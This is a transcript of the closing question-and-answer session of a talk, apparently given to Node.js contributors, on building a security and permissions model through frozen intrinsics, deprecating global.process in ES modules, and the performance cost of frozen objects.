Thank you. So as I say, this is a space where, in the JavaScript world, we're either going to have to rely on other server-side JavaScript projects spearheading work here — because the browser won't take the first step — or Node.js has an opportunity here to lead the ecosystem, without fragmenting the ecosystem, and slowly add on security, potentially. And as I say, we've got frozen intrinsics, we just need to follow through with some kind of frozen global idea and then deprecate global.process, and that is it, that's all I'm asking. So Matteo's argument is exactly the thing I'm talking about, and if anyone wants to hack on loaders that do permissions, I'd be very happy to chat. So then, anything else you want to talk about — Matteo, maybe you want to... So, accessing frozen objects is still a significant performance hit on V8 and Node. In order for this model to be successful, accessing frozen objects should not have any performance cost, and at this point in time it's pretty drastic — it has improved, but it's still there. And the model I want to reach is that security should not come at a cost, or should have a minimal overhead impact on the actual process. So these are opt-in flags — I'm not suggesting making it the default, the frozen intrinsics is an option, so if you want to... I know that, but it's just that the impact is... we need to make it viable for companies to make those their defaults. Sorry — so access performance for frozen objects is something to work on; that's great information, thank you. This is why we have these discussions. This is something that is needed, and it's not just that one piece, accessing frozen objects — let's discuss the performance of the global.process one too. But I hope that this talk has given you something to think about in terms of the security model that we could enable people to build on top of Node. And I think the point is that we're so close to it, and if we just do this one thing, we can open that door to, in 10 years' time, having a project that has a permissions model and has all these nice properties, and it would be very cool if that was Node and not another project. I totally agree with you, minus the fact that that's a very hard path and it's not necessarily the one we want to take — we'll discuss it from there. Does anyone else want to ask any questions about these models? Who do we have — is that Michael? Just wondering, the one you're talking about, the deprecation of process — can you make that opt-in as well, like, if there's an overhead? So what we're targeting here is we want users who are writing ES module JS not to assume that the global process is available. So what we're doing is we're making it available, but making it a getter that gives you a warning that says please don't use the global process. Now, if we do anything less than that, people will use it, they will publish it to npm, and it will be so ingrained we'll never be able to change it. And this is why browsers can't adopt any type of security model like this: because they have all these globals and these things that cannot be deprecated. And we have an opportunity, as we switch to ECMAScript modules, where we can specifically deprecate the global process, which is the only thing we need to remove to get to that kind of space. But let's continue this discussion further. Jan? Yeah, quick question about the concern by Matteo that this is a super hot path because of nextTick, which also brings me to: should
nextTick be the same kind of capability as having access to the process object? In other words, does this mean that we should, as soon as possible, introduce an alternative API to get nextTick — presumably also one that is not as confusingly named as nextTick, which actually does not give you a callback on the next tick, right? So you'd say, treat it as a separate API or something, and then if we deprecate that, then we deprecate that path or something. I feel like we do need to move fast, because we're hoping to unflag ES modules at some point, and we shouldn't assume we can suddenly change core APIs, but there's no reason we couldn't consider something like that over the longer term, I guess. I'm on board — like, you know, it's just a matter of pushing the change into the ecosystem and stuff like that, but it's definitely possible, it's just a matter of deciding. As I said, I'm not against the deprecation of process; I am concerned about where it is being used. And the nextTick part, that's slightly different. So as I said, I'm against that particular solution a little bit, to some extent, not the actual end result. I forgot to ask for questions from online — I don't know if we have any, let's just see if we've got any questions in the chat. Nope. Yeah, I don't see any questions there. So we'll call it there, and thanks everyone — please chat further with any of us from the modules group, or myself, about this work if you're interested in discussing it. Thank you.